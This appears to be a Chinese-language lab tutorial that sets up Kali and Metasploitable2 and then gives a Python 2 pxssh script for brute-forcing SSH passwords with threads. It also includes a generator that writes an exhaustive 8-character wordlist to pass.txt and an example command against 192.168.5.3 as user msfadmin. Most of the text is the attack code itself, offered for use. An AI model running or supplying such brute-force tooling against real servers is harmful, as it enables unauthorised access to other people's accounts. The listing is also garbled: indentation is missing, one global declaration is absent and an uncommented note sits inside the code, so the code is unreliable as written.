首先准备好环境
1、虚拟机kali Linux、metasploitable2-linux。
pip install pexpect
---------------------------------------------------------
2、源码
#!/usr/bin/python
#coding: utf-8
from pexpect import pxssh
import optparse
import time
from threading import *
maxConnections=5
connection_lock = BoundedSemaphore(value=maxConnections)
Found=False
Fails=0
def connect(host,user,password,release):
global Found
global Found
try:
s=pxssh.pxssh()
s.login(host,user,password)
print'[+] Password Found:' + password
Found=True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails+=1
time.sleep(5)
connect(host,user,password,False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host,user,password,False)
finally:
if release:
connection_lock.release()
def main():
parser=optparse.OptionParser()
parser.add_option('-H',dest='host',type='string')
parser.add_option('-u',dest='username',type='string')
parser.add_option('-f',dest='file',type='string')
(options,args)=parser.parse_args()
if (options.host == None) | (options.username == None) | (options.file == None):
print parser.usage
exit(0)
host = options.host
username=options.username
file=options.file
fn = open(file,'r')
for line in fn.readlines():
if Found:
print '[*] Exting: Passwrod Found'
exit(0)
if Fails > 5:
print '[!] Exiting: Too Many Socket Timeouts'
exit(0)
connection_lock.acquire()
password=line.strip('\r').strip('\n')
print '[-] Testing:' + str(password)
t = Thread(target=connect,args=(host,username,password,True))
child=t.start()
if __name__=='__main__':
main()
字典生成器:
import itertools as its
from threading import Thread
def main():
words = "ms.f1admin"
r = its.product(words,repeat=8)
dic = open("pass.txt","a") 写入pass.txt文件
for i in r:
dic.write("".join(i))
dic.write("".join("\n"))
dic.close()
main()
3、实际效果:
终端执行如下命令:
# python ssh.py -H 192.168.5.3 -u msfadmin -f pass.txt